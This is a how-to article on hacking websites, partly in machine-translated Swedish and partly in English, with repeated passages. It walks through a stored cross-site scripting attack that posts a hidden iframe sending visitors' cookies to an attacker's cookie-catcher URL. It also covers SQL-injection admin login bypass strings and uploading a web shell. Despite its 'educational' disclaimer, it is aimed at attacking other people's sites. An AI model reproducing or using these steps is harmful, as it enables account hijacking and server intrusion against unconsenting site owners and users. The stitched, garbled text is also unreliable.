Även om det inte är möjligt att hacka varje webbplats kan du kanske hacka en sårbar webbplats, till exempel ett anslagstavla.
Har du någonsin velat veta hur du hackar en webbplats? Även om det inte är möjligt att hacka varje webbplats kan du kanske hacka en sårbar webbplats, till exempel ett anslagstavla. Den här guiden visar dig hur du hackar en webbplats med skriptöverföring och injektionsattacker. Det kommer också att ge dig tips om hur du ställer in dig själv för framgång.
Har du någonsin velat veta hur du hackar en webbplats?
Obs! Den här guiden är strikt för utbildningsändamål, antingen för att hjälpa människor att börja lära sig vita mössor eller för att se hur hackare fungerar för att skydda sina egna webbplatser bättre. Denna handledning går igenom två hackningsmetoder, skriptöverföring på plats och SQL-injektion.
Steg
Metod 1 av 3: Använda skript på flera platser
1
Hitta en sårbar webbplats där du kan lägga upp innehåll. Ett anslagstavla är ett bra exempel. Kom ihåg att om webbplatsen inte är sårbar för en skriptattack på flera platser, så fungerar det inte.
2
Gå för att skapa ett inlägg. Du måste skriva in någon speciell kod i "inlägget" som kommer att fånga data för alla som klickar på den.
Du kommer att vilja testa för att se om systemet filtrerar bort koden. Posta
<script> window.alert ("test") </script>
Om en varningsruta visas när du klickar på ditt inlägg är webbplatsen sårbar för attacker.
3
Skapa och ladda upp din kakfångare. Målet med denna attack är att fånga en användares kakor, vilket ger dig tillgång till deras konto för webbplatser med sårbara inloggningar. Du behöver en cookie-catcher, som kommer att fånga ditt måls kakor och omdirigera dem. Ladda upp fångaren till en webbplats som du har tillgång till och som stöder PHP och är sårbar för fjärrkörning av kod via uppladdning. Ett exempel på kakfångarkod finns i exempelavsnittet.
4
Lägg upp med din kakfångare. Ange en korrekt kod i inlägget som kommer att fånga kakorna och skickade dem till din webbplats. Du vill lägga in lite text efter koden för att minska misstankar och förhindra att ditt inlägg tas bort.
Ett exempel på en kod skulle se ut <iframe frameborder="0" height="0" width="0" src="javascript...://void(document.location=YOURURL/cookiecatcher.php?c= document.cookie)></iframe>
_
_
5
Use the collected cookies. After this, you can use the cookie information, which should be saved to your website, for whatever purpose you need.
This guide will show you how to hack a site using cross site scripting as well as injection attacks.
Method 2 of 3: executing injection attacks
1
Find a vulnerable site. You will need to find a site that is vulnerable, due to an easily accessible admin login. Try searching on your favorite search engine for admin login.asp or admin login.php.
2
Login as an admin. Type admin as the username and use one of a number of different strings as the password. These can be any one of a number of different strings but a common example is 1'or'1'='1 or 2'='2.
3
Be patient. This is probably going to require a little trial and error.
4
Access the website. Eventually, you should be able to find a string that allows you admin access to a website, assuming the website is vulnerable to attack. Then, logged in as an administrator, you can perform further actions, such as uploading a web shell to gain server-side access if you can perform a file upload.
Upload the catcher to a website you have access to and that supports PHP and is vulnerable to remote code execution via upload.
Method 3 of 3: setting up for success
1
Learn a programming language or two. If you want to really learn how to hack websites, you will need to understand how computers and other technologies work. Learn to use programming languages like Python, PHP (necessary for exploiting server-side vulnerabilities) or SQL, so that you can gain better control of computers and identify vulnerabilities in systems.
2
Have basic HTML literacy. You will also need to have a really good understanding of HTML and JavaScript if you want to hack websites in particular. This can take time to learn but there are lots of free ways to learn on the internet, so you will certainly have the opportunity if you want to take it.
3
Consult with whitehats. Whitehats are hackers who use their powers for good, exposing security vulnerabilities and making the internet a better place for everyone. If you are wanting to learn to hack and use your powers for good or if you want to help protect your own website, you might want to contact some current whitehats for advice.
4
Research hacking. If you are wanting to learn to hack or if you just want to protect yourself, you will need to do a lot of research. There are so many different ways that websites can be vulnerable and the list is ever-changing, so you will need to be constantly learning.
5
Keep up to date. Because the list of possible hacks is ever-changing, and new vulnerabilites are discovered, you will need to be sure you keep up to date. Just because you are protected from a certain type of hack now doesn't mean you will be safe in the future!
Tips
Go to hacker forums to get lots of helpful tips.
This tutorial is strictly for educational purposes, either to help people begin to learn white hat hacking or to see how hackers work in order to protect their own sites better.
Warnings
If you read this article you do not immediately become a hacker. You MUST explore your skills and practice, practice, practice.
Yes, you can get caught, and you can also get in serious legal trouble for it depending on the nature of your hacking.
Can I learn programming online for free?
Yes, you can find interactive python learning or you could use a written tutorial made by others, but remember to understand the code and don't just copy and paste it.
How can I quickly learn Python or Sql when I already have experience in other programming languages?
Learn to make variables and most base functions. Python shares a lot of the same methods as C, for example.
What does it mean when it says 'alert(1")'?
If you use window.alert and an alert pops up, it is vulnerable.
What does it mean when it says Alert(XSS)?
That means a message is going to pop up saying the variable XSS.
What code can you write in Notepad?
You can write any code in Notepad, you just have to save the file in required format. However, for executing that code, you need some software; for example for HTML you need browser, for Java you need jav jdk.
Can I hack using Python?
You can't expect to hack a site by knowing a single programming language and nothing about html and/or javascript. It is also important to note that hacking is illegal, and you face consequences if you get caught.
What does Window.Alert(test) do?
Window.Alert is a Javascript function that calls up an alert window containing text.
How can I protect my site from being hacked?
The least time consuming way is to hire freelancers that find and patch vulnerabilities in your website. It's called ethical hacking.
How can I see if any Javascript is going to pop up?
You will need to post a Javascript in the website, like 'window.alert ('test').' this script makes an alert window, and, if that happens, it is vulnerable or hackable.
